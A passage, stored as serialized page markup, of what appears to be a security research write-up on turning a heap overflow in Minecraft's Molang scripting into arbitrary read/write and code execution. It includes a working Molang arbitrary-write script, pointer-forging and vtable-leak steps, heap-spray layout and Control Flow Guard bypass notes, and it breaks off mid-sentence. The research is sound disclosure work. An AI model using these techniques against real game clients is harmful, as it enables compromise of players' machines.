",{"type":28,"tag":98,"props":154099,"children":154101},{"className":154100},[],[154102],{"type":33,"value":152964},{"type":33,"value":56395},{"type":28,"tag":98,"props":154105,"children":154107},{"className":154106},[],[154108],{"type":33,"value":154109},"0xddcd",{"type":33,"value":269},{"type":28,"tag":98,"props":154112,"children":154114},{"className":154113},[],[154115],{"type":33,"value":154116},"0xddcc + 1",{"type":33,"value":154118},"), and then:",{"type":28,"tag":234,"props":154120,"children":154122},{"code":154121},"variable.b = variable.saved_adjusted_upper_16;\n",[154123],{"type":28,"tag":98,"props":154124,"children":154125},{"__ignoreMap":7},[154126],{"type":33,"value":154121},{"type":28,"tag":29,"props":154128,"children":154129},{},[154130,154132,154137,154139,154145,154146,154152],{"type":33,"value":154131},"Resulting in ",{"type":28,"tag":98,"props":154133,"children":154135},{"className":154134},[],[154136],{"type":33,"value":152978},{"type":33,"value":154138}," value becoming ",{"type":28,"tag":98,"props":154140,"children":154142},{"className":154141},[],[154143],{"type":33,"value":154144},"0x1c81",{"type":33,"value":269},{"type":28,"tag":98,"props":154147,"children":154149},{"className":154148},[],[154150],{"type":33,"value":154151},"0x1c80 + 1",{"type":33,"value":23600},{"type":28,"tag":234,"props":154154,"children":154156},{"code":154155},"                   +-------------+-------------+\n                   | cd dd 81 1c | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[154157],{"type":28,"tag":98,"props":154158,"children":154159},{"__ignoreMap":7},[154160],{"type":33,"value":154155},{"type":28,"tag":29,"props":154162,"children":154163},{},[154164],{"type":33,"value":154165},"Now we save the adjusted upper 48 bits:",{"type":28,"tag":234,"props":154167,"children":154169},{"code":154168},"variable.saved_adjusted_upper_48 = variable.a;\n",[154170],{"type":28,"tag":98,"props":154171,"children":154172},{"__ignoreMap":7},[154173],{"type":33,"value":154168},{"type":28,"tag":29,"props":154175,"children":154176},{},[154177],{"type":33,"value":154178},"Finally, we attach the lower 16 bits:",{"type":28,"tag":234,"props":154180,"children":154182},{"code":154181},"variable.a = variable.saved_adjusted_lower_16;\n",[154183],{"type":28,"tag":98,"props":154184,"children":154185},{"__ignoreMap":7},[154186],{"type":33,"value":154181},{"type":28,"tag":234,"props":154188,"children":154190},{"code":154189},"                   +-------------+-------------+\n                   | a8 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[154191],{"type":28,"tag":98,"props":154192,"children":154193},{"__ignoreMap":7},[154194],{"type":33,"value":154189},{"type":28,"tag":29,"props":154196,"children":154197},{},[154198],{"type":33,"value":154199},"And by setting:",{"type":28,"tag":234,"props":154201,"children":154203},{"code":154202},"variable.b = variable.saved_adjusted_upper_48;\n",[154204],{"type":28,"tag":98,"props":154205,"children":154206},{"__ignoreMap":7},[154207],{"type":33,"value":154202},{"type":28,"tag":29,"props":154209,"children":154210},{},[154211],{"type":33,"value":154212},"We forge the final adjusted pointer:",{"type":28,"tag":234,"props":154214,"children":154216},{"code":154215},"                   +-------------+-------------+\n                   | a8 bb cd dd | 81 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[154217],{"type":28,"tag":98,"props":154218,"children":154219},{"__ignoreMap":7},[154220],{"type":33,"value":154215},{"type":28,"tag":18457,"props":154222,"children":154223},{},[],{"type":28,"tag":29,"props":154225,"children":154226},{},[154227,154229,154234],{"type":33,"value":154228},"With this, we now have a method to calculate any pointer we want. However, the previous question still remains: how do we find a pointer to ",{"type":28,"tag":98,"props":154230,"children":154232},{"className":154231},[],[154233],{"type":33,"value":153760},{"type":33,"value":153716},{"type":28,"tag":29,"props":154236,"children":154237},{},[154238,154240,154245,154247,154252,154254,154260,154262,154267],{"type":33,"value":154239},"Eventually, we realized that we don’t necessarily need a pointer to ",{"type":28,"tag":98,"props":154241,"children":154243},{"className":154242},[],[154244],{"type":33,"value":153760},{"type":33,"value":154246},". Instead, we need any two pointers on the heap - one pointing to ",{"type":28,"tag":98,"props":154248,"children":154250},{"className":154249},[],[154251],{"type":33,"value":30342},{"type":33,"value":154253}," and the other to ",{"type":28,"tag":98,"props":154255,"children":154257},{"className":154256},[],[154258],{"type":33,"value":154259},"addr + 2",{"type":33,"value":154261}," (as long as ",{"type":28,"tag":98,"props":154263,"children":154265},{"className":154264},[],[154266],{"type":33,"value":30342},{"type":33,"value":154268}," lies within a writable region). The idea is to use these two pointers as a workspace where we can split, manipulate, and reconstruct a pointer.",{"type":28,"tag":29,"props":154270,"children":154271},{},[154272,154274,154279,154280,154285],{"type":33,"value":154273},"In this case, we need to corrupt an index of an additional (third) variable and make it index the ",{"type":28,"tag":98,"props":154275,"children":154277},{"className":154276},[],[154278],{"type":33,"value":149735},{"type":33,"value":153519},{"type":28,"tag":98,"props":154281,"children":154283},{"className":154282},[],[154284],{"type":33,"value":152538},{"type":33,"value":154286}," - once the new pointer is forged we can use this variable to assign it the forged pointer:",{"type":28,"tag":234,"props":154288,"children":154290},{"code":154289},"variable.corrupted_var_map_ptr = variable.a;\n",[154291],{"type":28,"tag":98,"props":154292,"children":154293},{"__ignoreMap":7},[154294],{"type":33,"value":154289},{"type":28,"tag":29,"props":154296,"children":154297},{},[154298,154300,154305,154307,154313],{"type":33,"value":154299},"As mentioned earlier, this operation copies the entire 64-bit ",{"type":28,"tag":98,"props":154301,"children":154303},{"className":154302},[],[154304],{"type":33,"value":38773},{"type":33,"value":154306}," field (in this case, the reconstructed pointer) and writes it to ",{"type":28,"tag":98,"props":154308,"children":154310},{"className":154309},[],[154311],{"type":33,"value":154312},"variable.corrupted_var_map_ptr",{"type":33,"value":154314},", even though the type itself is only a 32-bit float.",{"type":28,"tag":443,"props":154316,"children":154318},{"id":154317},"finding-misaligned-pointers",[154319],{"type":33,"value":154320},"Finding Misaligned Pointers",{"type":28,"tag":29,"props":154322,"children":154323},{},[154324,154326,154331,154332,154338],{"type":33,"value":154325},"This step requires a heap-sprayable structure that contains two pointers separated by two bytes (",{"type":28,"tag":98,"props":154327,"children":154329},{"className":154328},[],[154330],{"type":33,"value":13615},{"type":33,"value":10659},{"type":28,"tag":98,"props":154333,"children":154335},{"className":154334},[],[154336],{"type":33,"value":154337},"ptr + 2",{"type":33,"value":154339},"). Fortunately, we didn’t have to look far as we were already familiar with a suitable structure.",{"type":28,"tag":29,"props":154341,"children":154342},{},[154343,154348,154349,154354,154356,154361,154363,154368,154370,154375,154377,154382,154384,154390,154391,154396],{"type":28,"tag":98,"props":154344,"children":154346},{"className":154345},[],[154347],{"type":33,"value":152714},{"type":33,"value":15106},{"type":28,"tag":98,"props":154350,"children":154352},{"className":154351},[],[154353],{"type":33,"value":152737},{"type":33,"value":154355}," found inside every entity object. As noted earlier, a ",{"type":28,"tag":98,"props":154357,"children":154359},{"className":154358},[],[154360],{"type":33,"value":152568},{"type":33,"value":154362}," contains three pointers: ",{"type":28,"tag":98,"props":154364,"children":154366},{"className":154365},[],[154367],{"type":33,"value":149735},{"type":33,"value":154369}," (the start of the allocated buffer), ",{"type":28,"tag":98,"props":154371,"children":154373},{"className":154372},[],[154374],{"type":33,"value":8807},{"type":33,"value":154376}," (just past the last element) and ",{"type":28,"tag":98,"props":154378,"children":154380},{"className":154379},[],[154381],{"type":33,"value":152667},{"type":33,"value":154383}," (the end of the allocated buffer). Because the element type is ",{"type":28,"tag":98,"props":154385,"children":154387},{"className":154386},[],[154388],{"type":33,"value":154389},"uint16_t",{"type":33,"value":101911},{"type":28,"tag":98,"props":154392,"children":154394},{"className":154393},[],[154395],{"type":33,"value":8807},{"type":33,"value":154397}," pointer advances by 2 bytes each time a new element is added.",{"type":28,"tag":29,"props":154399,"children":154400},{},[154401,154403,154408,154410,154416],{"type":33,"value":154402},"We can make the ",{"type":28,"tag":98,"props":154404,"children":154406},{"className":154405},[],[154407],{"type":33,"value":8807},{"type":33,"value":154409}," pointer equal to ",{"type":28,"tag":98,"props":154411,"children":154413},{"className":154412},[],[154414],{"type":33,"value":154415},"cap - 2",{"type":33,"value":154417}," by adding elements until the vector is one element short of full. In practice this is done by filling the entity with previously unseen variables.",{"type":28,"tag":234,"props":154419,"children":154421},{"code":154420},"                         +-> +---------------+\n                         |   |               |\n                         |   |     . . .     |\n                         |   |               |\n                         |   +-------+-------+\n                         |   | 00 f0 | 00 f1 |\n                         |   +-------+-------+\n                         |   | 00 f2 | 00 f3 |\n                         |   +-------+-------+\n  std::vector\u003Cuint16_t>  |   | 00 f4 | 00 f5 |\n     MolangIndexMap      |   +-------+-------+\n    +----------------+   |   | 00 f6 | 00 00 |\nbuf | 0x1c54f7a13200 | --+   +-------+-------+\n    +----------------+               ^       ^\nlen | 0x1c54f7a13306 | --------------+       |\n    +----------------+                       |\ncap | 0x1c54f7a13308 | ----------------------+\n    +----------------+                        \n",[154422],{"type":28,"tag":98,"props":154423,"children":154424},{"__ignoreMap":7},[154425],{"type":33,"value":154420},{"type":28,"tag":18457,"props":154427,"children":154428},{},[],{"type":28,"tag":29,"props":154430,"children":154431},{},[154432,154434,154439,154441,154446,154448,154453,154455,154460,154461,154466],{"type":33,"value":154433},"To summarize - the final setup will require overwriting indices of three variables: one that would index the ",{"type":28,"tag":98,"props":154435,"children":154437},{"className":154436},[],[154438],{"type":33,"value":149735},{"type":33,"value":154440}," pointer of ",{"type":28,"tag":98,"props":154442,"children":154444},{"className":154443},[],[154445],{"type":33,"value":152538},{"type":33,"value":154447}," in the entity object above, one that would index ",{"type":28,"tag":98,"props":154449,"children":154451},{"className":154450},[],[154452],{"type":33,"value":8807},{"type":33,"value":154454}," and the final ",{"type":28,"tag":98,"props":154456,"children":154458},{"className":154457},[],[154459],{"type":33,"value":152667},{"type":33,"value":154440},{"type":28,"tag":98,"props":154462,"children":154464},{"className":154463},[],[154465],{"type":33,"value":152714},{"type":33,"value":154467}," also in the same entity object above.",{"type":28,"tag":29,"props":154469,"children":154470},{},[154471,154473,154479,154480,154486,154488,154493,154494,154499,154501,154506,154508,154513,154514,154519,154521,154526],{"type":33,"value":154472},"The corrupted variables ",{"type":28,"tag":98,"props":154474,"children":154476},{"className":154475},[],[154477],{"type":33,"value":154478},"variable.corrupted_len_ptr",{"type":33,"value":10659},{"type":28,"tag":98,"props":154481,"children":154483},{"className":154482},[],[154484],{"type":33,"value":154485},"variable.corrupted_cap_ptr",{"type":33,"value":154487}," point to ",{"type":28,"tag":98,"props":154489,"children":154491},{"className":154490},[],[154492],{"type":33,"value":8807},{"type":33,"value":10659},{"type":28,"tag":98,"props":154495,"children":154497},{"className":154496},[],[154498],{"type":33,"value":152667},{"type":33,"value":154500},", respectively - they are two bytes apart. With these two we can compute arbitrary pointers using the method previously described. The third corrupted variable, ",{"type":28,"tag":98,"props":154502,"children":154504},{"className":154503},[],[154505],{"type":33,"value":154312},{"type":33,"value":154507},", points to the ",{"type":28,"tag":98,"props":154509,"children":154511},{"className":154510},[],[154512],{"type":33,"value":149735},{"type":33,"value":153519},{"type":28,"tag":98,"props":154515,"children":154517},{"className":154516},[],[154518],{"type":33,"value":152538},{"type":33,"value":154520},"; it is used to copy the calculated pointer into the allocated buffer of ",{"type":28,"tag":98,"props":154522,"children":154524},{"className":154523},[],[154525],{"type":33,"value":152538},{"type":33,"value":154527},", which in turn lets us overwrite a pointer of a different (fourth) variable. That fourth corrupted variable is what we ultimately use for arbitrary read/write.",{"type":28,"tag":29,"props":154529,"children":154530},{},[154531],{"type":33,"value":154532},"Before we can do any arbitrary memory operations, however, we need a leak - ideally the address of any Minecraft executable region - that lets us perform arbitrary reads and writes into the target memory region.",{"type":28,"tag":443,"props":154534,"children":154536},{"id":154535},"leaking-pointers",[154537],{"type":33,"value":154538},"Leaking Pointers",{"type":28,"tag":29,"props":154540,"children":154541},{},[154542,154544,154550],{"type":33,"value":154543},"In C++, an object’s first field is typically a ",{"type":28,"tag":98,"props":154545,"children":154547},{"className":154546},[],[154548],{"type":33,"value":154549},"vtable",{"type":33,"value":154551}," pointer - a pointer into a read-only region of the executable in memory. That means the first field of the entity object contains an address inside the Minecraft executable, and we want to recover that value from our Molang script.",{"type":28,"tag":234,"props":154553,"children":154555},{"code":154554},"                                 Entity Object       \n                                                     \n                          +------------+------------+\n                          | vtable ptr |            |\n                          +------------+            |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                      +-> +------------+------------+\n                      |   |    buf     |    len     |\n      MolangIndexMap -+   +------------+------------+\n                      |   |    cap     |            |\n                   +--+-> +------------+------------+\n                   |      |    buf     |    len     |\nMolangVariableMap -+      +------------+------------+\n                   |      |    cap     |            |\n                   +----> +------------+            |\n                          |                         |\n                          +-------------------------+\n",[154556],{"type":28,"tag":98,"props":154557,"children":154558},{"__ignoreMap":7},[154559],{"type":33,"value":154554},{"type":28,"tag":29,"props":154561,"children":154562},{},[154563,154564,154569,154571,154576,154578,154583,154585,154590,154592,154597,154598,154603,154605,154610],{"type":33,"value":16275},{"type":28,"tag":98,"props":154565,"children":154567},{"className":154566},[],[154568],{"type":33,"value":38773},{"type":33,"value":154570}," field inside a ",{"type":28,"tag":98,"props":154572,"children":154574},{"className":154573},[],[154575],{"type":33,"value":152211},{"type":33,"value":154577}," is at offset ",{"type":28,"tag":98,"props":154579,"children":154581},{"className":154580},[],[154582],{"type":33,"value":152472},{"type":33,"value":154584},". We already control a corrupted variable, ",{"type":28,"tag":98,"props":154586,"children":154588},{"className":154587},[],[154589],{"type":33,"value":154478},{"type":33,"value":154591},", whose target we can shift by adding unseen variables: each unseen variable increments the ",{"type":28,"tag":98,"props":154593,"children":154595},{"className":154594},[],[154596],{"type":33,"value":8807},{"type":33,"value":153519},{"type":28,"tag":98,"props":154599,"children":154601},{"className":154600},[],[154602],{"type":33,"value":152714},{"type":33,"value":154604}," by 2 bytes, which in turn advances ",{"type":28,"tag":98,"props":154606,"children":154608},{"className":154607},[],[154609],{"type":33,"value":154478},{"type":33,"value":154611}," by 2 bytes.",{"type":28,"tag":29,"props":154613,"children":154614},{},[154615,154617,154622,154624,154630,154631,154636,154637,154642,154644,154649],{"type":33,"value":154616},"By moving ",{"type":28,"tag":98,"props":154618,"children":154620},{"className":154619},[],[154621],{"type":33,"value":8807},{"type":33,"value":154623}," so it equals ",{"type":28,"tag":98,"props":154625,"children":154627},{"className":154626},[],[154628],{"type":33,"value":154629},"cap - 0x38",{"type":33,"value":101911},{"type":28,"tag":98,"props":154632,"children":154634},{"className":154633},[],[154635],{"type":33,"value":38773},{"type":33,"value":153519},{"type":28,"tag":98,"props":154638,"children":154640},{"className":154639},[],[154641],{"type":33,"value":154478},{"type":33,"value":154643}," will overlap the first 8 bytes of the adjacent heap chunk above - in our case, the entity object (manipulated by the heap spray) - which means those first 8 bytes are the entity’s ",{"type":28,"tag":98,"props":154645,"children":154647},{"className":154646},[],[154648],{"type":33,"value":154549},{"type":33,"value":154650}," pointer. We can then capture that pointer with:",{"type":28,"tag":234,"props":154652,"children":154654},{"code":154653},"variable.saved_vtable_pointer = variable.corrupted_len_ptr;\n",[154655],{"type":28,"tag":98,"props":154656,"children":154657},{"__ignoreMap":7},[154658],{"type":33,"value":154653},{"type":28,"tag":29,"props":154660,"children":154661},{},[154662,154664,154669,154671,154676,154678,154683,154685,154691],{"type":33,"value":154663},"After saving the leak, we add 27 unseen variables to advance ",{"type":28,"tag":98,"props":154665,"children":154667},{"className":154666},[],[154668],{"type":33,"value":8807},{"type":33,"value":154670}," until it equals ",{"type":28,"tag":98,"props":154672,"children":154674},{"className":154673},[],[154675],{"type":33,"value":154415},{"type":33,"value":154677},". That produces the setup required for our arbitrary read/write primitive while having the leaked ",{"type":28,"tag":98,"props":154679,"children":154681},{"className":154680},[],[154682],{"type":33,"value":154549},{"type":33,"value":154684}," address in ",{"type":28,"tag":98,"props":154686,"children":154688},{"className":154687},[],[154689],{"type":33,"value":154690},"variable.saved_vtable_pointer",{"type":33,"value":141},{"type":28,"tag":18457,"props":154693,"children":154694},{},[],{"type":28,"tag":29,"props":154696,"children":154697},{},[154698,154700,154705,154707,154713],{"type":33,"value":154699},"A Molang script that performs an arbitrary write of the value ",{"type":28,"tag":98,"props":154701,"children":154703},{"className":154702},[],[154704],{"type":33,"value":43124},{"type":33,"value":154706}," to the address ",{"type":28,"tag":98,"props":154708,"children":154710},{"className":154709},[],[154711],{"type":33,"value":154712},"vtable + 0x1000",{"type":33,"value":154714}," looks like this:",{"type":28,"tag":234,"props":154716,"children":154718},{"code":154717},"// calculate lower 16\nvariable.corrupted_len_ptr = variable.saved_vtable_lower_16;\nvariable.corrupted_cap_ptr = 0;\n// subtract the offset of `value` field within MolangVariable (0x38)\nvariable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1000 - 0x38);\nvariable.calculated_lower_16 = variable.corrupted_len_ptr;\n\n// calculate middle 16, check if lower 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_middle_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_lower_16 >= itof(0x10000)) ? {\n    variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_middle_16 = variable.corrupted_len_ptr;\n\n// calculate high 16, check if middle 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_high_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_middle_16 >= itof(0x10000)) ? {\n    variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_high_16 = variable.corrupted_len_ptr;\n\n// construct the final pointer\nvariable.corrupted_len_ptr = variable.calculated_middle_16;\nvariable.corrupted_cap_ptr = variable.calculated_high_16;\nvariable.calculated_upper_48 = variable.corrupted_len_ptr;\nvariable.corrupted_len_ptr = variable.calculated_lower_16;\nvariable.corrupted_cap_ptr = variable.calculated_upper_48;\n\n// copy the constructed pointer to MolangVariableMap\nvariable.corrupted_var_map_ptr = variable.corrupted_len_ptr;\n\n// variable.f pointer is now `vtable + 0x1000 - 0x38`\n// and the value 0x1337 is written at `vtable + 0x1000`\nvariable.f = itof(0x1337);\n",[154719],{"type":28,"tag":98,"props":154720,"children":154721},{"__ignoreMap":7},[154722],{"type":33,"value":154717},{"type":28,"tag":443,"props":154724,"children":154726},{"id":154725},"required-heap-layout",[154727],{"type":33,"value":154728},"Required Heap Layout",{"type":28,"tag":29,"props":154730,"children":154731},{},[154732],{"type":33,"value":154733},"To ensure our attack works, the heap spray would manipulate the layout as such once the indices are overwritten:",{"type":28,"tag":234,"props":154735,"children":154737},{"code":154736},"    Heap Region 1                Heap Region 2    \n                                                  \n+-------------------+        +-------------------+\n|                   |        |                   |\n| MolangVariableMap |        |  MolangIndexMap   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n|   Entity Object   |        |   Entity Object   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n| MolangVariableMap |        |  MolangIndexMap   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n|   Entity Object   |        |   Entity Object   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n",[154738],{"type":28,"tag":98,"props":154739,"children":154740},{"__ignoreMap":7},[154741],{"type":33,"value":154736},{"type":28,"tag":29,"props":154743,"children":154744},{},[154745,154747,154753,154755,154760,154762,154767,154769,154774,154775,154780],{"type":33,"value":154746},"The first region (",{"type":28,"tag":98,"props":154748,"children":154750},{"className":154749},[],[154751],{"type":33,"value":154752},"Heap Region 1",{"type":33,"value":154754},") contains alternating ",{"type":28,"tag":98,"props":154756,"children":154758},{"className":154757},[],[154759],{"type":33,"value":152538},{"type":33,"value":154761},"-allocated buffers and entity objects. The purpose of this region is that, once a variable index is out of bounds, it can index internal ",{"type":28,"tag":98,"props":154763,"children":154765},{"className":154764},[],[154766],{"type":33,"value":152568},{"type":33,"value":154768}," pointers of ",{"type":28,"tag":98,"props":154770,"children":154772},{"className":154771},[],[154773],{"type":33,"value":152538},{"type":33,"value":10659},{"type":28,"tag":98,"props":154776,"children":154778},{"className":154777},[],[154779],{"type":33,"value":152714},{"type":33,"value":154781}," from the entity object for our main attack.",{"type":28,"tag":29,"props":154783,"children":154784},{},[154785,154787,154793,154795,154800,154802,154807,154809,154814,154816,154821],{"type":33,"value":154786},"The second region (",{"type":28,"tag":98,"props":154788,"children":154790},{"className":154789},[],[154791],{"type":33,"value":154792},"Heap Region 2",{"type":33,"value":154794},") contains interleaved ",{"type":28,"tag":98,"props":154796,"children":154798},{"className":154797},[],[154799],{"type":33,"value":152714},{"type":33,"value":154801},"-allocated buffers and entity objects. This region exists so we can leak an entity object's ",{"type":28,"tag":98,"props":154803,"children":154805},{"className":154804},[],[154806],{"type":33,"value":154549},{"type":33,"value":154808}," pointer into ",{"type":28,"tag":98,"props":154810,"children":154812},{"className":154811},[],[154813],{"type":33,"value":154478},{"type":33,"value":154815}," during our main attack. It could be any object with a ",{"type":28,"tag":98,"props":154817,"children":154819},{"className":154818},[],[154820],{"type":33,"value":154549},{"type":33,"value":154822},", but for simplicity we use the entity object.",{"type":28,"tag":29,"props":154824,"children":154825},{},[154826,154828,154834,154836,154841],{"type":33,"value":154827},"During the attack, overwriting another variable's pointer with\n",{"type":28,"tag":98,"props":154829,"children":154831},{"className":154830},[],[154832],{"type":33,"value":154833},"variable.corrupted_var_map_ptr = variable.corrupted_len_ptr",{"type":33,"value":154835}," will very likely clobber the ",{"type":28,"tag":98,"props":154837,"children":154839},{"className":154838},[],[154840],{"type":33,"value":153034},{"type":33,"value":154842}," pointer of a different entity than the one subject to the initial index corruption. In practice this means: an entity affected by the initial corruption will leak and compute an arbitrary read/write address, then use that address to overwrite a variable pointer in a second, separate entity. The second entity is then used purely to perform arbitrary reads and writes via that variable.",{"type":28,"tag":29,"props":154844,"children":154845},{},[154846],{"type":33,"value":154847},"Because of this cross-entity behavior, we must synchronize all entities. At the time we implemented the exploit we couldn't find a clean way to force synchronized execution. Our workaround was to place all allocated entities at the same world position and put the Molang script into the animation section. Animation scripts are not executed for entities outside the client's field of view, so none of the Molang code runs until the entities become visible.",{"type":28,"tag":29,"props":154849,"children":154850},{},[154851],{"type":33,"value":154852},"The final exploit proceeds in three stages:",{"type":28,"tag":455,"props":154854,"children":154855},{},[154856,154861,154866],{"type":28,"tag":459,"props":154857,"children":154858},{},[154859],{"type":33,"value":154860},"Position the player so the sprayed entities are out of view (their Molang scripts remain dormant)",{"type":28,"tag":459,"props":154862,"children":154863},{},[154864],{"type":33,"value":154865},"Perform the heap spray with signs to create the desired layout for the attack",{"type":28,"tag":459,"props":154867,"children":154868},{},[154869],{"type":33,"value":154870},"Move the client so all sprayed entities enter the field of view - their animation scripts (our Molang payload) then execute, triggering the leak and the subsequent arbitrary read/write primitive.",{"type":28,"tag":443,"props":154872,"children":154874},{"id":154873},"initial-corruption-variant-lfh-heap-approach",[154875],{"type":33,"value":154876},"Initial Corruption Variant: LFH Heap Approach",{"type":28,"tag":29,"props":154878,"children":154879},{},[154880],{"type":33,"value":154881},"As mentioned above, LFH heap chunks have no headers and chunk data is adjacent, so the attack can also be carried out in the LFH heap instead of the VS heap. In that case the chunk overlap method is unnecessary - the overflown 4-byte value can be used directly to overwrite the first two variable indices.",{"type":28,"tag":29,"props":154883,"children":154884},{},[154885,154887,154892,154893,154899],{"type":33,"value":154886},"There is no variable at index 0 in the global variable map because when a new variable is encountered it is assigned ",{"type":28,"tag":98,"props":154888,"children":154890},{"className":154889},[],[154891],{"type":33,"value":152781},{"type":33,"value":6159},{"type":28,"tag":98,"props":154894,"children":154896},{"className":154895},[],[154897],{"type":33,"value":154898},"last_index",{"type":33,"value":154900}," is initialized to 0 at program start. Therefore the first two bytes of the 4-byte overflow are irrelevant - only the last two bytes overwrite a single variable index.",{"type":28,"tag":29,"props":154902,"children":154903},{},[154904,154906,154911,154912,154917,154919,154924,154926,154931,154933,154938,154940,154946,154947,154953,154954,154960],{"type":33,"value":154905},"The main attack can be arranged by making the resulting index point at the ",{"type":28,"tag":98,"props":154907,"children":154909},{"className":154908},[],[154910],{"type":33,"value":149735},{"type":33,"value":153519},{"type":28,"tag":98,"props":154913,"children":154915},{"className":154914},[],[154916],{"type":33,"value":152714},{"type":33,"value":154918},". From there, the script can overwrite three variable indices at offset ",{"type":28,"tag":98,"props":154920,"children":154922},{"className":154921},[],[154923],{"type":33,"value":152472},{"type":33,"value":154925}," within the ",{"type":28,"tag":98,"props":154927,"children":154929},{"className":154928},[],[154930],{"type":33,"value":152714},{"type":33,"value":154932}," by using the string type. This works because a Molang string's value is just a ",{"type":28,"tag":98,"props":154934,"children":154936},{"className":154935},[],[154937],{"type":33,"value":55253},{"type":33,"value":154939}," FNV-1 hash; the required string can be found by brute-forcing until the hash contains the three target indices. For example, to overwrite three indices with values ",{"type":28,"tag":98,"props":154941,"children":154943},{"className":154942},[],[154944],{"type":33,"value":154945},"0xfb",{"type":33,"value":825},{"type":28,"tag":98,"props":154948,"children":154950},{"className":154949},[],[154951],{"type":33,"value":154952},"0xfc",{"type":33,"value":10659},{"type":28,"tag":98,"props":154955,"children":154957},{"className":154956},[],[154958],{"type":33,"value":154959},"0xfd",{"type":33,"value":154961}," the script would do:",{"type":28,"tag":234,"props":154963,"children":154965},{"code":154964},"variable.corrupted_index_map_ptr = 'r80n3jsuc';\n",[154966],{"type":28,"tag":98,"props":154967,"children":154968},{"__ignoreMap":7},[154969],{"type":33,"value":154964},{"type":28,"tag":29,"props":154971,"children":154972},{},[154973,154975,154980,154981,154987,154989,154994],{"type":33,"value":154974},"That line would write the ",{"type":28,"tag":98,"props":154976,"children":154978},{"className":154977},[],[154979],{"type":33,"value":55253},{"type":33,"value":91789},{"type":28,"tag":98,"props":154982,"children":154984},{"className":154983},[],[154985],{"type":33,"value":154986},"0x302700fb00fc00fd",{"type":33,"value":154988}," (string's FNV-1 hash) into the allocated ",{"type":28,"tag":98,"props":154990,"children":154992},{"className":154991},[],[154993],{"type":33,"value":152714},{"type":33,"value":154995}," buffer, overwriting three indices with the required values and setting up the desired arbitrary read / write primitive state.",{"type":28,"tag":75,"props":154997,"children":154999},{"id":154998},"hijacking-execution",[155000],{"type":33,"value":155001},"Hijacking Execution",{"type":28,"tag":29,"props":155003,"children":155004},{},[155005,155007,155012,155014,155020],{"type":33,"value":155006},"Although we can read and write arbitrary values inside the Minecraft memory region - including many ",{"type":28,"tag":98,"props":155008,"children":155010},{"className":155009},[],[155011],{"type":33,"value":154549},{"type":33,"value":155013}," and function pointers in the writable ",{"type":28,"tag":98,"props":155015,"children":155017},{"className":155016},[],[155018],{"type":33,"value":155019},".data",{"type":33,"value":155021}," section - the exploit is not complete: Control Flow Guard (CFG) prevents us from gaining arbitrary code execution by overwriting those pointers and executing a ROP chain.",{"type":28,"tag":29,"props":155023,"children":155024},{},[155025],{"type":33,"value":155026},"CFG is a runtime mitigation that blocks indirect jumps/calls to unapproved addresses; it will crash on an indirect transfer to a location not in its valid-target set.",{"type":28,"tag":29,"props":155028,"children":155029},{},[155030],{"type":33,"value":155031},"Examining Minecraft-specific functions and their disassembly shows the following:",{"type":28,"tag":29,"props":155033,"children":155034},{},[155035],{"type":28,"tag":206,"props":155036,"children":155038},{"alt":50198,"src":155037},"/posts/minecraft-heap-overflow-to-rce/image11.png",[],{"type":28,"tag":29,"props":155040,"children":155041},{},[155042,155044,155050,155052,155058,155060,155065,155067,155072,155074,155080,155082,155087,155089,155095,155097,155102],{"type":33,"value":155043},"This snippet calls a method on an object: ",{"type":28,"tag":98,"props":155045,"children":155047},{"className":155046},[],[155048],{"type":33,"value":155049},"rcx",{"type":33,"value":155051}," holds the object pointer, the first ",{"type":28,"tag":98,"props":155053,"children":155055},{"className":155054},[],[155056],{"type":33,"value":155057},"mov",{"type":33,"value":155059}," loads the object's ",{"type":28,"tag":98,"props":155061,"children":155063},{"className":155062},[],[155064],{"type":33,"value":154549},{"type":33,"value":155066}," into ",{"type":28,"tag":98,"props":155068,"children":155070},{"className":155069},[],[155071],{"type":33,"value":56393},{"type":33,"value":155073},", and the function pointer at ",{"type":28,"tag":98,"props":155075,"children":155077},{"className":155076},[],[155078],{"type":33,"value":155079},"rax + 0x8",{"type":33,"value":155081}," is read into ",{"type":28,"tag":98,"props":155083,"children":155085},{"className":155084},[],[155086],{"type":33,"value":56393},{"type":33,"value":155088},". Finally, ",{"type":28,"tag":98,"props":155090,"children":155092},{"className":155091},[],[155093],{"type":33,"value":155094},"__guard_dispatch_icall_fptr",{"type":33,"value":155096}," is called - this is the CFG dispatch function that validates ",{"type":28,"tag":98,"props":155098,"children":155100},{"className":155099},[],[155101],{"type":33,"value":56393},{"type":33,"value":155103}," as a legal call target before invoking it.",{"type":28,"tag":29,"props":155105,"children":155106},{},[155107],{"type":33,"value":155108},"All DLLs in the Minecraft directory are compiled with CFG. However, we later found an assembly snippet in the Minecraft executable that calls an object method directly, without a CFG dispatch:",{"type":28,"tag":29,"props":155110,"children":155111},{},[155112],{"type":28,"tag":206,"props":155113,"children":155115},{"alt":50198,"src":155114},"/posts/minecraft-heap-overflow-to-rce/image12.png",[],{"type":28,"tag":29,"props":155117,"children":155118},{},[155119,155121,155127,155129,155135],{"type":33,"value":155120},"Here, the function pointer at ",{"type":28,"tag":98,"props":155122,"children":155124},{"className":155123},[],[155125],{"type":33,"value":155126},"vtable + 